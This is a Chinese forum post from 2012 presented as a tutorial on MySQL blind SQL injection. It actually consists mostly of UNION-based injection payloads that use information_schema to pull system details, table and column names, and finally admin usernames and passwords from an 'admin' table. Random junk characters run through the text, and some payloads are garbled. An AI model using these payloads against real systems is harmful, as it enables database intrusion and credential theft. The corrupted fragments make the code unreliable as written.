本文介绍MYSQL盲注的一些语句和方法3 o k. P) E/ u1 e+ o
w- [7 ~. b. Q2 L3 d学习盲注前先了解下 IFORMATION_SCHEMA 库
& ^! n# y& ]7 T8 ^& X' x+ s: l. ?3 P0 [& S9 s+ E
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有+ M( n/ }, S' W3 R. p5 D
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。7 _1 }8 }9 U' I% |8 H
1.得到所有数据库名:$ S* T( D( L" G" U' a3 I( n# L
|SCHEMATA ->存储数据库名的表0 _7 S) Q0 A" N& ~
|---字段:SCHEMA_NAME ->数据库名称) K, k9 p% U m; F3 J
6 l% \3 Q/ M' `$ B+ m9 d7 L|TABLES ->存储表名
& _$ n8 Z" ~# M% j; Q8 k2 W- x|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名. P; v9 v$ q& B+ T' Q1 p( h
|---字段:TABLE_NAME ->存储表的表名. C I! ~5 p& Y! j7 V. N
6 `, }. o- E& C|COLUMNS ->存储的字段名表, @2 |; _6 s2 Y( I( h# s
|---字段:TABLE_SCHEMA ->该字段所属数据库名6 }5 P& `* T! a# I% i
|---字段:TABLE_NAME ->存储所属表的名称
4 Q A. N' Y: l
& l0 H+ l) r2 u2 g; P|---字段:COLUMN_NAME ->该字段的名称
& h/ p% z8 o: O/ M2 S) R. n6 O
& @, B) ]3 @7 A" ~) O
d( ? h- V }8 ^
5 q# X* h6 s( ^1 D- W###########################################################################
' K5 F5 H$ W- @0 {8 S& B3 D1 L9 G1 }8 W& o
0x001 获取系统信息:
" i- P/ _$ y# S9 U! Q
3 B4 R/ B! s+ q+ s) }% X* e, }union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*5 } Y' H0 m% X+ D6 e/ N
& {% l0 P/ U, J) u: n/*
! b. P% h5 _4 [* P3 i. \4 x V/ \- c5 t: R' t3 {9 t
@@global.version_compile_os 获取系统版本# x/ h, r$ H3 y+ H3 ^
) ]: B& l% e! S1 s$ q0 i@@datadir 数据库路径
# c9 Y- h) k' \" L( q8 A jdatabase() 当前数据库名称
. X4 I4 p" }3 F0 [) \0x3c62723e 换行HEX值* i! ?; K# l, V! I' J8 p
0 l# I( d9 E" b5 Y# `4 r
*/( ^4 G/ ], c$ b7 `
* A |8 s6 ^/ z5 @/ X! O0 G $ M$ N i% e) x, X
' G" }6 ^* s N* S5 _######################################################################
]& ?- M8 E5 z& ]) P1 {
4 {3 D+ t" R% c4 h! |4 K- S0x002 获取表名
3 r5 V4 B$ M+ v1 x! t i/ ~
- x2 Y' Y( s, V- v( b6 D( x: {union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
; ?6 c- @7 K$ x; ?
' N A5 c+ A2 p5 O
+ L% b+ G# w" }" ?# Q- D8 k$ O9 _: @8 N( N
/*) O# h `0 W% x; [
- z7 X$ Y* M1 f1 u9 @- t4 w! N4 h0x67617264656e 为当前数据库名" O+ `5 p* u) L) Y* d
1 l" D; z+ N& u0 D0 [- k
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
+ W1 K$ v& I2 P! L5 v+ [ V
/ x5 t, L2 ?) n% G1 U' X*/
; A& W9 A# p9 ]& [$ F" O' K7 A" l' }4 ?
######################################################################
1 E, r# [( \5 O+ r0 a$ \$ R1 D" W5 H- u5 ^7 ~, T% _
: m% o8 T; G$ _, p: A6 t. o% Y0 f& u0 m& T+ y+ D2 H8 _% `
0x003 获取字段
' M$ O, M# |: U1 u: S: M+ ~* n* x" {1 v3 J6 w2 ~8 C( \; [7 v' t
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*( i* j. `3 t- D. I, G! {" R
" {# _; w& k9 U* _/*
2 N7 Y0 h! u3 X, l2 |
k3 q4 d7 C' N7 |% q/ Y) U) \) ngroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段2 |0 x d# \5 b$ X/ O: l
$ F8 I7 j4 ?1 y( ? z0x61646d696e ->选择一个表
8 w; [5 h/ C0 x6 F% l, w- x, a
1 ~2 ]! X# g/ O6 [7 ]0 ?+ g0x67617264656e ->数据库名/ X; Y/ j) |, @
6 ?, T5 c1 b, u
*/
2 ]# i: h2 W8 D' ?5 i8 }' b$ [6 I6 g9 \; X. ]
#####################################################################- G7 T- ^: f& z8 `/ X
+ B6 ]# u9 I! O' M0 H# d
% R# E9 A x% e% i# @* W* C
$ N8 g- V" ]! M0x004 获取数据
& c7 k) r8 v) a8 l6 |$ B- {! z" r# Z8 O `5 [$ j$ ?+ G
union select 1,2,38 q) q7 f2 s% O- m
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
3 s; M7 B z4 s& o i: @5 K2 j `9 A0 [5 r
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin" }* g: d9 l( A, k) ^: X
$ j4 \ B9 Y9 t- f2 R0 P& {
6 |9 A! h) H* t: o2 {7 P* k
! A% G' A% d9 C/* m' T' g$ I$ r# G* M1 E% v, I
" o& m2 y& o# M! Q, g0x3c62723e 换行符号HEX编码
( i: X+ h+ B& G1 G0 d9 b" ~) ?; @. p
% R# c( G5 {1 e2 D) Egroup_concat 同时获得该字段所有数据9 a5 r* p( `6 {% g) r9 Y& v, T
. d# E6 }5 H* b7 b
*/8 B4 W( X, [ [& W
% G; t; M0 W, E% N2 s* [$ Z! V# K8 i3 k
|
发表于 2012-9-13 17:48:44
收藏
支持
反对